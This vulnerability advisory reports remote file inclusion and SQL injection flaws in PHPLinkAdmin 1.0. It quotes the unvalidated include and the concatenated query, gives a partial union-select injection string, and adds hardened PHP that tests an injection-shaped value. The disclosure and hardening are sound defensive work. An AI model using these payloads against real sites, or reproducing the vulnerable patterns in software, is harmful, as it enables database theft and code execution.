[+] Beerwin's PHPLinkAdmin 1.0 Remote File Inclusion/SQL Injection
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
[+] Download : http://www.downloads.beerwin.com/index.php?p=showdl&dl=16&cat=18
[+] Remote File Inclusion
Direct access to linkadmin. No auth.
Vulnerable code in linkadmin.php :
$page = $_REQUEST['page'];   // attacker-controlled request parameter
if (!$page){
echo "Welcome to the PHPLINKADMIN!.
Please select an action from
the left menu.";
}
include $page;               // included without validation or allowlist
PoC :
[+] Remote SQL Injection
There are a lot of SQL Injection vulnerabilities in the script. I will
present only one.
Vulnerable code in edlink.php :
if (!$linkid){
echo "Error: Link missing!";
}
// $linkid is concatenated into the query string unescaped
$sql=mysql_query("SELECT * FROM linktable WHERE linkid='$linkid'")
or die(mysql_error());
PoC :' union all select
There is nothing important to extract from the database.
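
[+] Hardened form of both snippets (added example, not part of the original advisory and not PHPLinkAdmin's own code). The page keys, the file names, the url column and the in-memory SQLite database are assumptions so the block runs stand-alone; linktable and linkid are taken from the code above.

```php
<?php
// 1) linkadmin.php: resolve the request value through a fixed allowlist
//    instead of handing it to include. Keys and file names are hypothetical.
const PAGES = [
    'addlink' => 'addlink.php',
    'edlink'  => 'edlink.php',
];

function resolve_page(?string $requested): ?string
{
    // Exact key match only: URLs, stream wrappers and ../ paths never match.
    if ($requested === null || !array_key_exists($requested, PAGES)) {
        return null;
    }
    return __DIR__ . '/' . PAGES[$requested];
}

// 2) edlink.php: validate linkid as a positive integer, then bind it as a
//    parameter so it is never part of the SQL text.
function fetch_link(PDO $db, $linkid): ?array
{
    $id = filter_var($linkid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // quote/union style input is rejected before any query runs
    }
    $stmt = $db->prepare('SELECT * FROM linktable WHERE linkid = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data; SQLite stands in for the script's MySQL database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE linktable (linkid INTEGER PRIMARY KEY, url TEXT)');
$db->exec("INSERT INTO linktable (linkid, url) VALUES (1, 'http://example.com/')");

// Allowed key resolves to a local file; anything else resolves to null.
var_dump(resolve_page('edlink'));
var_dump(resolve_page('http://example.org/x.txt'));

// Valid id returns the row; an injection-shaped value returns null.
var_dump(fetch_link($db, '1'));
var_dump(fetch_link($db, "1' union all select 1,2"));
```

In the real script the caller would include the resolved path only when resolve_page() returns non-null, and only after an authentication check, since the advisory notes linkadmin is reachable without auth.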